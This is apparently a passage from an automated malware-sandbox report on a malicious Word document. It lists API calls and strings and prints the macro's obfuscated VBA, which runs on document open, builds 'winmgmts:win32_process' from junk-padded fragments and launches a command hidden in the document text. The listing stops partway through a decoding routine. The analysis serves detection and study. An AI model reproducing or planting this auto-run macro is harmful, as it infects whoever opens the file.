                                                                                                                              Part of subcall function Joieredaxt98oc6o@Lxvinhyq0hu0i: Open

                                                                                                                              Part of subcall function Joieredaxt98oc6o@Lxvinhyq0hu0i: Open

                                                                                                                              Part of subcall function Joieredaxt98oc6o@Lxvinhyq0hu0i: Open

                                                                                                                              Part of subcall function Joieredaxt98oc6o@Lxvinhyq0hu0i: Open

                                                                                                                              Part of subcall function Joieredaxt98oc6o@Lxvinhyq0hu0i: Open

                                                                                                                              Part of subcall function Joieredaxt98oc6o@Lxvinhyq0hu0i: Open

                                                                                                                              Part of subcall function Joieredaxt98oc6o@Lxvinhyq0hu0i: Open

                                                                                                                              Part of subcall function Joieredaxt98oc6o@Lxvinhyq0hu0i: Open

                                                                                                                              Part of subcall function Joieredaxt98oc6o@Lxvinhyq0hu0i: ChrW

                                                                                                                              Part of subcall function Joieredaxt98oc6o@Lxvinhyq0hu0i: wdKeyS

                                                                                                                              Part of subcall function Joieredaxt98oc6o@Lxvinhyq0hu0i: Open

                                                                                                                              Part of subcall function Joieredaxt98oc6o@Lxvinhyq0hu0i: Open

                                                                                                                              Part of subcall function Joieredaxt98oc6o@Lxvinhyq0hu0i: Open

                                                                                                                              Part of subcall function Joieredaxt98oc6o@Lxvinhyq0hu0i: Open

                                                                                                                              Part of subcall function Joieredaxt98oc6o@Lxvinhyq0hu0i: Open

                                                                                                                              Part of subcall function Joieredaxt98oc6o@Lxvinhyq0hu0i: Open

                                                                                                                              Part of subcall function Joieredaxt98oc6o@Lxvinhyq0hu0i: Open

                                                                                                                              Part of subcall function Joieredaxt98oc6o@Lxvinhyq0hu0i: Open

                                                                                                                              Part of subcall function Joieredaxt98oc6o@Lxvinhyq0hu0i: Open

                                                                                                                              Part of subcall function Joieredaxt98oc6o@Lxvinhyq0hu0i: CreateObject

                                                                                                                              Part of subcall function Joieredaxt98oc6o@Lxvinhyq0hu0i: Open

                                                                                                                              Part of subcall function Joieredaxt98oc6o@Lxvinhyq0hu0i: Open

                                                                                                                              Part of subcall function Joieredaxt98oc6o@Lxvinhyq0hu0i: Open

                                                                                                                              Part of subcall function Joieredaxt98oc6o@Lxvinhyq0hu0i: Mid

                                                                                                                              Part of subcall function Joieredaxt98oc6o@Lxvinhyq0hu0i: Len

                                                                                                                              Part of subcall function Joieredaxt98oc6o@Lxvinhyq0hu0i: Open

                                                                                                                              Part of subcall function Joieredaxt98oc6o@Lxvinhyq0hu0i: Open

                                                                                                                              Part of subcall function Joieredaxt98oc6o@Lxvinhyq0hu0i: Open

                                                                                                                              Part of subcall function Joieredaxt98oc6o@Lxvinhyq0hu0i: Open

                                                                                                                              Part of subcall function Joieredaxt98oc6o@Lxvinhyq0hu0i: Open

                                                                                                                              Part of subcall function Joieredaxt98oc6o@Lxvinhyq0hu0i: Open

                                                                                                                              Part of subcall function Joieredaxt98oc6o@Lxvinhyq0hu0i: Create

                                                                                                                              Part of subcall function Joieredaxt98oc6o@Lxvinhyq0hu0i: Xzrkngu1iuo6rwg

                                                                                                                              Part of subcall function Joieredaxt98oc6o@Lxvinhyq0hu0i: Np29qma1fg5ke

                                                                                                                              Part of subcall function Joieredaxt98oc6o@Lxvinhyq0hu0i: Open

                                                                                                                              Part of subcall function Joieredaxt98oc6o@Lxvinhyq0hu0i: Open

                                                                                                                              Part of subcall function Joieredaxt98oc6o@Lxvinhyq0hu0i: Open

                                                                                                                              Part of subcall function Joieredaxt98oc6o@Lxvinhyq0hu0i: Open

                                                                                                                              Part of subcall function Joieredaxt98oc6o@Lxvinhyq0hu0i: Open

                                                                                                                              Part of subcall function Joieredaxt98oc6o@Lxvinhyq0hu0i: Open

                                                                                                                              LineInstructionMeta Information
                                                                                                                              9

                                                                                                                              Private Sub Document_open()

                                                                                                                              10

                                                                                                                              Joieredaxt98oc6o

                                                                                                                              11

                                                                                                                              End Sub

                                                                                                                              Module: Lxvinhyq0hu0i

                                                                                                                              Declaration
                                                                                                                              LineContent
                                                                                                                              1

                                                                                                                              Attribute VB_Name = "Lxvinhyq0hu0i"

                                                                                                                              Non-Executed Functions
                                                                                                                              Function Joieredaxt98oc6o, APIs: 69, Strings: 40, Number of lines: 230, Relevance: 163.73
                                                                                                                              APIsMeta Information

                                                                                                                              Item

                                                                                                                              Open

                                                                                                                              Open

                                                                                                                              Open

                                                                                                                              Open

                                                                                                                              Open

                                                                                                                              Open

                                                                                                                              Open

                                                                                                                              Open

                                                                                                                              Open

                                                                                                                              Open

                                                                                                                              Open

                                                                                                                              Open

                                                                                                                              ChrW

                                                                                                                              wdKeyS

                                                                                                                              Open

                                                                                                                              Open

                                                                                                                              Open

                                                                                                                              Open

                                                                                                                              Open

                                                                                                                              Open

                                                                                                                              Part of subcall function Us5rvv097omc6@Lxvinhyq0hu0i: Open

                                                                                                                              Part of subcall function Us5rvv097omc6@Lxvinhyq0hu0i: Open

                                                                                                                              Part of subcall function Us5rvv097omc6@Lxvinhyq0hu0i: Open

                                                                                                                              Part of subcall function Us5rvv097omc6@Lxvinhyq0hu0i: Open

                                                                                                                              Part of subcall function Us5rvv097omc6@Lxvinhyq0hu0i: Open

                                                                                                                              Part of subcall function Us5rvv097omc6@Lxvinhyq0hu0i: Open

                                                                                                                              Part of subcall function Us5rvv097omc6@Lxvinhyq0hu0i: Open

                                                                                                                              Part of subcall function Us5rvv097omc6@Lxvinhyq0hu0i: Open

                                                                                                                              Part of subcall function Us5rvv097omc6@Lxvinhyq0hu0i: Open

                                                                                                                              Part of subcall function Us5rvv097omc6@Lxvinhyq0hu0i: Open

                                                                                                                              Part of subcall function Us5rvv097omc6@Lxvinhyq0hu0i: Open

                                                                                                                              Part of subcall function Us5rvv097omc6@Lxvinhyq0hu0i: Open

                                                                                                                              Open

                                                                                                                              Open

                                                                                                                              Open

                                                                                                                              CreateObject

                                                                                                                              Open

                                                                                                                              Open

                                                                                                                              Open

                                                                                                                              Mid

                                                                                                                              Len

                                                                                                                              Open

                                                                                                                              Open

                                                                                                                              Open

                                                                                                                              Open

                                                                                                                              Open

                                                                                                                              Open

                                                                                                                              Create

                                                                                                                              Part of subcall function Us5rvv097omc6@Lxvinhyq0hu0i: Open

                                                                                                                              Part of subcall function Us5rvv097omc6@Lxvinhyq0hu0i: Open

                                                                                                                              Part of subcall function Us5rvv097omc6@Lxvinhyq0hu0i: Open

                                                                                                                              Part of subcall function Us5rvv097omc6@Lxvinhyq0hu0i: Open

                                                                                                                              Part of subcall function Us5rvv097omc6@Lxvinhyq0hu0i: Open

                                                                                                                              Part of subcall function Us5rvv097omc6@Lxvinhyq0hu0i: Open

                                                                                                                              Part of subcall function Us5rvv097omc6@Lxvinhyq0hu0i: Open

                                                                                                                              Part of subcall function Us5rvv097omc6@Lxvinhyq0hu0i: Open

                                                                                                                              Part of subcall function Us5rvv097omc6@Lxvinhyq0hu0i: Open

                                                                                                                              Part of subcall function Us5rvv097omc6@Lxvinhyq0hu0i: Open

                                                                                                                              Part of subcall function Us5rvv097omc6@Lxvinhyq0hu0i: Open

                                                                                                                              Part of subcall function Us5rvv097omc6@Lxvinhyq0hu0i: Open

                                                                                                                              Xzrkngu1iuo6rwg

                                                                                                                              Np29qma1fg5ke

                                                                                                                              Open

                                                                                                                              Open

                                                                                                                              Open

                                                                                                                              Open

                                                                                                                              Open

                                                                                                                              Open

                                                                                                                              StringsDecrypted Strings
                                                                                                                              "fNHCB.hbEBBG.feKiwC"
                                                                                                                              "cklcdFF.ljzQFAII.yhDYGICo"
                                                                                                                              "KeuGF.APuwUHxl.GiUhBFB"
                                                                                                                              "J)(3s2)(pJ)(3s2)("
                                                                                                                              "J)(3""s2)(roJ)(3s2"")(J)(3s2)(ceJ)(3s2"")(sJ)(3s2)(sJ)(3s""2)(J)(3s2)("
                                                                                                                              "NhKID.SYBhRIEGg.qCLeaM"
                                                                                                                              "dZEvHBM.HWisMo.kLMoA"
                                                                                                                              "NPkiDT.CkfBJvJ.bgnwZAB"
                                                                                                                              "J)(3s2)("":wJ)(3s2)(J)(3s""2)(inJ)(3s2)(3J)(""3s2)(2J)(3s2)(_J)(3s2)("
                                                                                                                              "BpfOu.TVoTOHe.EzrPEDJ"
                                                                                                                              "pJlGBGe.jIXSWL.jkAfAEIf"
                                                                                                                              "pPiJFZzI.dfizGxy.NRcSrA"
                                                                                                                              "wJ)(3s2)(i""nJ)(3s2)(mJ)(3s2)(gmJ)(3""s2)(tJ)(3s2)(J)(3s2)("
                                                                                                                              "OqezBEGR.dKnPpE.XZiNID"
                                                                                                                              "WWmJGCEWG.XCrNGJ.ficHzH"
                                                                                                                              "iYrsMDeBF.SIoiFJ.zdnAB"
                                                                                                                              "zSasAJg.LDOIU.vvZOFJ"
                                                                                                                              "cBBImVFtj.VfOyHcZeG.KTQGJQv"
                                                                                                                              "AtMXEHJGF.tPVXDfJI.vNeXEIF"
                                                                                                                              "zpGvEhCHv.ZNcWIJcU.qeFzJB"
                                                                                                                              "aguCEDpx.XlUcBUj.UPogGhX"
                                                                                                                              "ErIlZF.tHbIE.idUJKwuOi"
                                                                                                                              "uozeDEQ.xTczzpJbJ.GKYoFkDTH"
                                                                                                                              "oScEJFIH.GpYhI.ZPvpk"
                                                                                                                              "gjoHAq.pgiDH.iYppCzD"
                                                                                                                              "TNqlmI.VQzWNlJC.IuleF"
                                                                                                                              "QWkiJ.sNlBSC.hsUWFP"
                                                                                                                              "rqFdfCgk.WuMsFCHq.wYpcBKVBP"
                                                                                                                              "AcrzGL.zwvmHG.MqsxCr"
                                                                                                                              "XIjXFFFIJ.jYAPtLTyj.PLtLFT"
                                                                                                                              "MiwKq.hkWsDcI.YmoTAGR"
                                                                                                                              "NgFRIFlFQ.imXZAJE.tzzlC"
                                                                                                                              "RSIiW.JGdvBjSmB.WubTFJ"
                                                                                                                              "NipqJ.tIztQI.WMXjaJ"
                                                                                                                              "dCIAJyHr.uGSFGCFE.hgENI"
                                                                                                                              "gEMlED.skZhEggk.ZyWBD"
                                                                                                                              "bfJqAKr.cLEdAF.oYWiAFEQ"
                                                                                                                              "eHqqE.nCeMDET.kZWuQGE"
                                                                                                                              "hSzhx.onZqBBzG.aRYCE"
                                                                                                                              "BiUfo.vtUVwAWGC.hUSLqGGIO"
                                                                                                                              LineInstructionMeta Information
                                                                                                                              42

                                                                                                                              Function Joieredaxt98oc6o()

                                                                                                                              43

                                                                                                                              On Error Resume Next

                                                                                                                              44

                                                                                                                              mn2b = Dk5att0cu_9jsb.StoryRanges.Item(1)

                                                                                                                              Item

                                                                                                                              45

                                                                                                                              Goto nmHtBKNIA

                                                                                                                              46

                                                                                                                              Dim kaqktK as String

                                                                                                                              47

                                                                                                                              Open "fNHCB.hbEBBG.feKiwC" For Binary As 221

                                                                                                                              Open

                                                                                                                              48

                                                                                                                              Put # 221, , kaqktK

                                                                                                                              49

                                                                                                                              Close # 221

                                                                                                                              49

                                                                                                                              nmHtBKNIA:

                                                                                                                              51

                                                                                                                              Goto MVKdEA

                                                                                                                              52

                                                                                                                              Dim RZyrFJ as String

                                                                                                                              53

                                                                                                                              Open "cklcdFF.ljzQFAII.yhDYGICo" For Binary As 166

                                                                                                                              Open

                                                                                                                              54

                                                                                                                              Put # 166, , RZyrFJ

                                                                                                                              55

                                                                                                                              Close # 166

                                                                                                                              55

                                                                                                                              MVKdEA:

                                                                                                                              57

                                                                                                                              Goto lfRjBXXFA

                                                                                                                              58

                                                                                                                              Dim yJzxGZak as String

                                                                                                                              59

                                                                                                                              Open "KeuGF.APuwUHxl.GiUhBFB" For Binary As 105

                                                                                                                              Open

                                                                                                                              60

                                                                                                                              Put # 105, , yJzxGZak

                                                                                                                              61

                                                                                                                              Close # 105

                                                                                                                              61

                                                                                                                              lfRjBXXFA:

                                                                                                                              63

                                                                                                                              mwb2 = "J)(3s2)(pJ)(3s2)("

                                                                                                                              64

                                                                                                                              Uytq7q8qmjumesrn6n = "J)(3" + "s2)(roJ)(3s2" + ")(J)(3s2)(ceJ)(3s2" + ")(sJ)(3s2)(sJ)(3s" + "2)(J)(3s2)("

                                                                                                                              65

                                                                                                                              Goto FzSmxUBI

                                                                                                                              66

                                                                                                                              Dim JubeVI as String

                                                                                                                              67

                                                                                                                              Open "NhKID.SYBhRIEGg.qCLeaM" For Binary As 150

                                                                                                                              Open

                                                                                                                              68

                                                                                                                              Put # 150, , JubeVI

                                                                                                                              69

                                                                                                                              Close # 150

                                                                                                                              69

                                                                                                                              FzSmxUBI:

                                                                                                                              71

                                                                                                                              Goto cIiApH

                                                                                                                              72

                                                                                                                              Dim JKIoD as String

                                                                                                                              73

                                                                                                                              Open "dZEvHBM.HWisMo.kLMoA" For Binary As 143

                                                                                                                              Open

                                                                                                                              74

                                                                                                                              Put # 143, , JKIoD

                                                                                                                              75

                                                                                                                              Close # 143

                                                                                                                              75

                                                                                                                              cIiApH:

                                                                                                                              77

                                                                                                                              Goto olbDbIA

                                                                                                                              78

                                                                                                                              Dim QyqGnByH as String

                                                                                                                              79

                                                                                                                              Open "NPkiDT.CkfBJvJ.bgnwZAB" For Binary As 115

                                                                                                                              Open

                                                                                                                              80

                                                                                                                              Put # 115, , QyqGnByH

                                                                                                                              81

                                                                                                                              Close # 115

                                                                                                                              81

                                                                                                                              olbDbIA:

                                                                                                                              83

                                                                                                                              Po2ytmcrm_ypc = "J)(3s2)(" + ":wJ)(3s2)(J)(3s" + "2)(inJ)(3s2)(3J)(" + "3s2)(2J)(3s2)(_J)(3s2)("

                                                                                                                              84

                                                                                                                              Goto jJMCQJDB

                                                                                                                              85

                                                                                                                              Dim PrigNJEs as String

                                                                                                                              86

                                                                                                                              Open "BpfOu.TVoTOHe.EzrPEDJ" For Binary As 188

                                                                                                                              Open

                                                                                                                              87

                                                                                                                              Put # 188, , PrigNJEs

                                                                                                                              88

                                                                                                                              Close # 188

                                                                                                                              88

                                                                                                                              jJMCQJDB:

                                                                                                                              90

                                                                                                                              Goto yDuIa

                                                                                                                              91

                                                                                                                              Dim KAedr as String

                                                                                                                              92

                                                                                                                              Open "pJlGBGe.jIXSWL.jkAfAEIf" For Binary As 255

                                                                                                                              Open

                                                                                                                              93

                                                                                                                              Put # 255, , KAedr

                                                                                                                              94

                                                                                                                              Close # 255

                                                                                                                              94

                                                                                                                              yDuIa:

                                                                                                                              96

                                                                                                                              Goto fGzqP

                                                                                                                              97

                                                                                                                              Dim EiViHgGI as String

                                                                                                                              98

                                                                                                                              Open "pPiJFZzI.dfizGxy.NRcSrA" For Binary As 101

                                                                                                                              Open

                                                                                                                              99

                                                                                                                              Put # 101, , EiViHgGI

                                                                                                                              100

                                                                                                                              Close # 101

                                                                                                                              100

                                                                                                                              fGzqP:

                                                                                                                              102

                                                                                                                              E4yx9bkuv6v1jxlzz = "wJ)(3s2)(i" + "nJ)(3s2)(mJ)(3s2)(gmJ)(3" + "s2)(tJ)(3s2)(J)(3s2)("

                                                                                                                              103

                                                                                                                              Goto YEAwF

                                                                                                                              104

                                                                                                                              Dim kySRBFED as String

                                                                                                                              105

                                                                                                                              Open "OqezBEGR.dKnPpE.XZiNID" For Binary As 184

                                                                                                                              Open

                                                                                                                              106

                                                                                                                              Put # 184, , kySRBFED

                                                                                                                              107

                                                                                                                              Close # 184

                                                                                                                              107

                                                                                                                              YEAwF:

                                                                                                                              109

                                                                                                                              Goto jWIUH

                                                                                                                              110

                                                                                                                              Dim wVgZExzI as String

                                                                                                                              111

                                                                                                                              Open "WWmJGCEWG.XCrNGJ.ficHzH" For Binary As 234

                                                                                                                              Open

                                                                                                                              112

                                                                                                                              Put # 234, , wVgZExzI

                                                                                                                              113

                                                                                                                              Close # 234

                                                                                                                              113

                                                                                                                              jWIUH:

                                                                                                                              115

                                                                                                                              Goto XvETIO

                                                                                                                              116

                                                                                                                              Dim FzOAw as String

                                                                                                                              117

                                                                                                                              Open "iYrsMDeBF.SIoiFJ.zdnAB" For Binary As 173

                                                                                                                              Open

                                                                                                                              118

                                                                                                                              Put # 173, , FzOAw

                                                                                                                              119

                                                                                                                              Close # 173

                                                                                                                              119

                                                                                                                              XvETIO:

                                                                                                                              121

                                                                                                                              Aaq271x4j__7dcviuj = ChrW(wdKeyS)

                                                                                                                              ChrW

                                                                                                                              wdKeyS

                                                                                                                              122

                                                                                                                              Goto qLfbCLdC

                                                                                                                              123

                                                                                                                              Dim SEnkGD as String

                                                                                                                              124

                                                                                                                              Open "zSasAJg.LDOIU.vvZOFJ" For Binary As 233

                                                                                                                              Open

                                                                                                                              125

                                                                                                                              Put # 233, , SEnkGD

                                                                                                                              126

                                                                                                                              Close # 233

                                                                                                                              126

                                                                                                                              qLfbCLdC:

                                                                                                                              128

                                                                                                                              Goto yqztDCl

                                                                                                                              129

                                                                                                                              Dim AJXECAN as String

                                                                                                                              130

                                                                                                                              Open "cBBImVFtj.VfOyHcZeG.KTQGJQv" For Binary As 256

                                                                                                                              Open

                                                                                                                              131

                                                                                                                              Put # 256, , AJXECAN

                                                                                                                              132

                                                                                                                              Close # 256

                                                                                                                              132

                                                                                                                              yqztDCl:

                                                                                                                              134

                                                                                                                              Goto yDAMCG

                                                                                                                              135

                                                                                                                              Dim zoqaA as String

                                                                                                                              136

                                                                                                                              Open "AtMXEHJGF.tPVXDfJI.vNeXEIF" For Binary As 212

                                                                                                                              Open

                                                                                                                              137

                                                                                                                              Put # 212, , zoqaA

                                                                                                                              138

                                                                                                                              Close # 212

                                                                                                                              138

                                                                                                                              yDAMCG:

                                                                                                                              140

                                                                                                                              Av35ujjoujldl9 = E4yx9bkuv6v1jxlzz + Aaq271x4j__7dcviuj + Po2ytmcrm_ypc + mwb2 + Uytq7q8qmjumesrn6n

                                                                                                                              141

                                                                                                                              Goto hVRJE

                                                                                                                              142

                                                                                                                              Dim IGamxCG as String

                                                                                                                              143

                                                                                                                              Open "zpGvEhCHv.ZNcWIJcU.qeFzJB" For Binary As 161

                                                                                                                              Open

                                                                                                                              144

                                                                                                                              Put # 161, , IGamxCG

                                                                                                                              145

                                                                                                                              Close # 161

                                                                                                                              145

                                                                                                                              hVRJE:

                                                                                                                              147

                                                                                                                              Goto VIuzQOE

                                                                                                                              148

                                                                                                                              Dim JxVVF as String

                                                                                                                              149

                                                                                                                              Open "aguCEDpx.XlUcBUj.UPogGhX" For Binary As 208

                                                                                                                              Open

                                                                                                                              150

                                                                                                                              Put # 208, , JxVVF

                                                                                                                              151

                                                                                                                              Close # 208

                                                                                                                              151

                                                                                                                              VIuzQOE:

                                                                                                                              153

                                                                                                                              Goto jSGTCFaK

                                                                                                                              154

                                                                                                                              Dim lOYxmwBA as String

                                                                                                                              155

                                                                                                                              Open "ErIlZF.tHbIE.idUJKwuOi" For Binary As 110

                                                                                                                              Open

                                                                                                                              156

                                                                                                                              Put # 110, , lOYxmwBA

                                                                                                                              157

                                                                                                                              Close # 110

                                                                                                                              157

                                                                                                                              jSGTCFaK:

                                                                                                                              159

                                                                                                                              Xyc25um2qhx = Us5rvv097omc6(Av35ujjoujldl9)

                                                                                                                              160

                                                                                                                              Goto lbHAbDF

                                                                                                                              161

                                                                                                                              Dim iZGGBKjGH as String

                                                                                                                              162

                                                                                                                              Open "uozeDEQ.xTczzpJbJ.GKYoFkDTH" For Binary As 135

                                                                                                                              Open

                                                                                                                              163

                                                                                                                              Put # 135, , iZGGBKjGH

                                                                                                                              164

                                                                                                                              Close # 135

                                                                                                                              164

                                                                                                                              lbHAbDF:

                                                                                                                              166

                                                                                                                              Goto nhVWCG

                                                                                                                              167

                                                                                                                              Dim cHoJJlDBJ as String

                                                                                                                              168

                                                                                                                              Open "oScEJFIH.GpYhI.ZPvpk" For Binary As 150

                                                                                                                              Open

                                                                                                                              169

                                                                                                                              Put # 150, , cHoJJlDBJ

                                                                                                                              170

                                                                                                                              Close # 150

                                                                                                                              170

                                                                                                                              nhVWCG:

                                                                                                                              172

                                                                                                                              Goto TFhBESFIX

                                                                                                                              173

                                                                                                                              Dim OXtlEDLCd as String

                                                                                                                              174

                                                                                                                              Open "gjoHAq.pgiDH.iYppCzD" For Binary As 165

                                                                                                                              Open

                                                                                                                              175

                                                                                                                              Put # 165, , OXtlEDLCd

                                                                                                                              176

                                                                                                                              Close # 165

                                                                                                                              176

                                                                                                                              TFhBESFIX:

                                                                                                                              178

                                                                                                                              Set Tbkimf15gklpyjuc5 = CreateObject(Xyc25um2qhx)

                                                                                                                              CreateObject

                                                                                                                              179

                                                                                                                              Goto dcClB

                                                                                                                              180

                                                                                                                              Dim uYPoFiE as String

                                                                                                                              181

                                                                                                                              Open "TNqlmI.VQzWNlJC.IuleF" For Binary As 98

                                                                                                                              Open

                                                                                                                              182

                                                                                                                              Put # 98, , uYPoFiE

                                                                                                                              183

                                                                                                                              Close # 98

                                                                                                                              183

                                                                                                                              dcClB:

                                                                                                                              185

                                                                                                                              Goto sbVXlJE

                                                                                                                              186

                                                                                                                              Dim YaqiI as String

                                                                                                                              187

                                                                                                                              Open "QWkiJ.sNlBSC.hsUWFP" For Binary As 145

                                                                                                                              Open

                                                                                                                              188

                                                                                                                              Put # 145, , YaqiI

                                                                                                                              189

                                                                                                                              Close # 145

                                                                                                                              189

                                                                                                                              sbVXlJE:

                                                                                                                              191

                                                                                                                              Goto UbSMfKFUj

                                                                                                                              192

                                                                                                                              Dim BRfTAJ as String

                                                                                                                              193

                                                                                                                              Open "rqFdfCgk.WuMsFCHq.wYpcBKVBP" For Binary As 236

                                                                                                                              Open

                                                                                                                              194

                                                                                                                              Put # 236, , BRfTAJ

                                                                                                                              195

                                                                                                                              Close # 236

                                                                                                                              195

                                                                                                                              UbSMfKFUj:

                                                                                                                              197

                                                                                                                              U4fasjmuqzl8g4y9 = Mid(mn2b, (5), Len(mn2b))

                                                                                                                              Mid

                                                                                                                              Len

                                                                                                                              198

                                                                                                                              Goto FoTWuD

                                                                                                                              199

                                                                                                                              Dim hkpqEBd as String

                                                                                                                              200

                                                                                                                              Open "AcrzGL.zwvmHG.MqsxCr" For Binary As 213

                                                                                                                              Open

                                                                                                                              201

                                                                                                                              Put # 213, , hkpqEBd

                                                                                                                              202

                                                                                                                              Close # 213

                                                                                                                              202

                                                                                                                              FoTWuD:

                                                                                                                              204

                                                                                                                              Goto VipWJ

                                                                                                                              205

                                                                                                                              Dim GwJXIC as String

                                                                                                                              206

                                                                                                                              Open "XIjXFFFIJ.jYAPtLTyj.PLtLFT" For Binary As 165

                                                                                                                              Open

                                                                                                                              207

                                                                                                                              Put # 165, , GwJXIC

                                                                                                                              208

                                                                                                                              Close # 165

                                                                                                                              208

                                                                                                                              VipWJ:

                                                                                                                              210

                                                                                                                              Goto yHCsJFACD

                                                                                                                              211

                                                                                                                              Dim eTuZIDG as String

                                                                                                                              212

                                                                                                                              Open "MiwKq.hkWsDcI.YmoTAGR" For Binary As 135

                                                                                                                              Open

                                                                                                                              213

                                                                                                                              Put # 135, , eTuZIDG

                                                                                                                              214

                                                                                                                              Close # 135

                                                                                                                              214

                                                                                                                              yHCsJFACD:

                                                                                                                              216

                                                                                                                              Goto FEJNFPMF

                                                                                                                              217

                                                                                                                              Dim UFEneAQF as String

                                                                                                                              218

                                                                                                                              Open "NgFRIFlFQ.imXZAJE.tzzlC" For Binary As 153

                                                                                                                              Open

                                                                                                                              219

                                                                                                                              Put # 153, , UFEneAQF

                                                                                                                              220

                                                                                                                              Close # 153

                                                                                                                              220

                                                                                                                              FEJNFPMF:

                                                                                                                              222

                                                                                                                              Goto rDIcxFB

                                                                                                                              223

                                                                                                                              Dim EhrmhuB as String

                                                                                                                              224

                                                                                                                              Open "RSIiW.JGdvBjSmB.WubTFJ" For Binary As 118

                                                                                                                              Open

                                                                                                                              225

                                                                                                                              Put # 118, , EhrmhuB

                                                                                                                              226

                                                                                                                              Close # 118

                                                                                                                              226

                                                                                                                              rDIcxFB:

                                                                                                                              228

                                                                                                                              Goto xuAPcBl

                                                                                                                              229

                                                                                                                              Dim mxDIrHC as String

                                                                                                                              230

                                                                                                                              Open "NipqJ.tIztQI.WMXjaJ" For Binary As 202

                                                                                                                              Open

                                                                                                                              231

                                                                                                                              Put # 202, , mxDIrHC

                                                                                                                              232

                                                                                                                              Close # 202

                                                                                                                              232

                                                                                                                              xuAPcBl:

                                                                                                                              234

                                                                                                                              Tbkimf15gklpyjuc5.Create Us5rvv097omc6(U4fasjmuqzl8g4y9), Xzrkngu1iuo6rwg, Np29qma1fg5ke

                                                                                                                              Create

                                                                                                                              Xzrkngu1iuo6rwg

                                                                                                                              Np29qma1fg5ke

                                                                                                                              235

                                                                                                                              Goto pxMXSJrIc

                                                                                                                              236

                                                                                                                              Dim JzcNByvAX as String

                                                                                                                              237

                                                                                                                              Open "dCIAJyHr.uGSFGCFE.hgENI" For Binary As 133

                                                                                                                              Open

                                                                                                                              238

                                                                                                                              Put # 133, , JzcNByvAX

                                                                                                                              239

                                                                                                                              Close # 133

                                                                                                                              239

                                                                                                                              pxMXSJrIc:

                                                                                                                              241

                                                                                                                              Goto NwlcQEELI

                                                                                                                              242

                                                                                                                              Dim BrrXfI as String

                                                                                                                              243

                                                                                                                              Open "gEMlED.skZhEggk.ZyWBD" For Binary As 239

                                                                                                                              Open

                                                                                                                              244

                                                                                                                              Put # 239, , BrrXfI

                                                                                                                              245

                                                                                                                              Close # 239

                                                                                                                              245

                                                                                                                              NwlcQEELI:

                                                                                                                              247

                                                                                                                              Goto ZxZNGGUBd

                                                                                                                              248

                                                                                                                              Dim CtmaxWDYG as String

                                                                                                                              249

                                                                                                                              Open "bfJqAKr.cLEdAF.oYWiAFEQ" For Binary As 143

                                                                                                                              Open

                                                                                                                              250

                                                                                                                              Put # 143, , CtmaxWDYG

                                                                                                                              251

                                                                                                                              Close # 143

                                                                                                                              251

                                                                                                                              ZxZNGGUBd:

                                                                                                                              253

                                                                                                                              Goto IIJMEYBZ

                                                                                                                              254

                                                                                                                              Dim ohdoz as String

                                                                                                                              255

                                                                                                                              Open "eHqqE.nCeMDET.kZWuQGE" For Binary As 147

                                                                                                                              Open

                                                                                                                              256

                                                                                                                              Put # 147, , ohdoz

                                                                                                                              257

                                                                                                                              Close # 147

                                                                                                                              257

                                                                                                                              IIJMEYBZ:

                                                                                                                              259

                                                                                                                              Goto aDFRF

                                                                                                                              260

                                                                                                                              Dim TLfxGCa as String

                                                                                                                              261

                                                                                                                              Open "hSzhx.onZqBBzG.aRYCE" For Binary As 269

                                                                                                                              Open

                                                                                                                              262

                                                                                                                              Put # 269, , TLfxGCa

                                                                                                                              263

                                                                                                                              Close # 269

                                                                                                                              263

                                                                                                                              aDFRF:

                                                                                                                              265

                                                                                                                              Goto zHYrT

                                                                                                                              266

                                                                                                                              Dim QqQRUOBIy as String

                                                                                                                              267

                                                                                                                              Open "BiUfo.vtUVwAWGC.hUSLqGGIO" For Binary As 194

                                                                                                                              Open

                                                                                                                              268

                                                                                                                              Put # 194, , QqQRUOBIy

                                                                                                                              269

                                                                                                                              Close # 194

                                                                                                                              269

                                                                                                                              zHYrT:

                                                                                                                              271

                                                                                                                              End Function

                                                                                                                              Function Us5rvv097omc6, APIs: 20, Strings: 12, Number of lines: 78, Relevance: 48.078
                                                                                                                              APIsMeta Information

                                                                                                                              Open

                                                                                                                              Open

                                                                                                                              Open

                                                                                                                              Open

                                                                                                                              Open

                                                                                                                              Open

                                                                                                                              Part of subcall function Gdxyahu7r2bnouqu@Lxvinhyq0hu0i: Open

                                                                                                                              Part of subcall function Gdxyahu7r2bnouqu@Lxvinhyq0hu0i: Open

                                                                                                                              Part of subcall function Gdxyahu7r2bnouqu@Lxvinhyq0hu0i: Open

                                                                                                                              Part of subcall function Gdxyahu7r2bnouqu@Lxvinhyq0hu0i: Replace

                                                                                                                              Part of subcall function Gdxyahu7r2bnouqu@Lxvinhyq0hu0i: H9dyim0o_e1y2ad

                                                                                                                              Part of subcall function Gdxyahu7r2bnouqu@Lxvinhyq0hu0i: Open

                                                                                                                              Part of subcall function Gdxyahu7r2bnouqu@Lxvinhyq0hu0i: Open

                                                                                                                              Part of subcall function Gdxyahu7r2bnouqu@Lxvinhyq0hu0i: Open

                                                                                                                              Open

                                                                                                                              Open

                                                                                                                              Open

                                                                                                                              Open

                                                                                                                              Open

                                                                                                                              Open

                                                                                                                              StringsDecrypted Strings
                                                                                                                              "CXrJJB.OBfnW.uqEngDYV"
                                                                                                                              "HGXMmlZoZ.jEXaTVE.zeocvMGG"
                                                                                                                              "ZFWwdLJFE.FcQNSnyB.yuKyrJAD"
                                                                                                                              "obWgmFILu.KLSrfFHDI.nylpN"
                                                                                                                              "DcfnrACC.XeVEC.QdSVCUJ"
                                                                                                                              "nYskWX.aOSpmAFIB.kCBksCD"
                                                                                                                              "cfmqZH.yHFfXEyD.iUezXEC"
                                                                                                                              "dcEwJD.cZCpC.kfXrIC"
                                                                                                                              "qKjdvEDq.lYfhW.eTVwADADD"
                                                                                                                              "DbRqLDGCg.nxwYCaF.sZZrJ"
                                                                                                                              "nRpjIJ.tkIcCAbCF.hJzbH"
                                                                                                                              "gtvUAW.KeNGGlEDI.FCFXBEHbH"
                                                                                                                              LineInstructionMeta Information
                                                                                                                              272

                                                                                                                              Function Us5rvv097omc6(Wj34bkji64gbgi_p)

                                                                                                                              273

                                                                                                                              On Error Resume Next

                                                                                                                              274

                                                                                                                              Goto RMyrFd

                                                                                                                              275

                                                                                                                              Dim uJtiAP as String

                                                                                                                              276

                                                                                                                              Open "CXrJJB.OBfnW.uqEngDYV" For Binary As 206

                                                                                                                              Open

                                                                                                                              277

                                                                                                                              Put # 206, , uJtiAP

                                                                                                                              278

                                                                                                                              Close # 206

                                                                                                                              278

                                                                                                                              RMyrFd:

                                                                                                                              280

                                                                                                                              Goto ZqNrvaa

                                                                                                                              281

                                                                                                                              Dim dThRBEAv as String

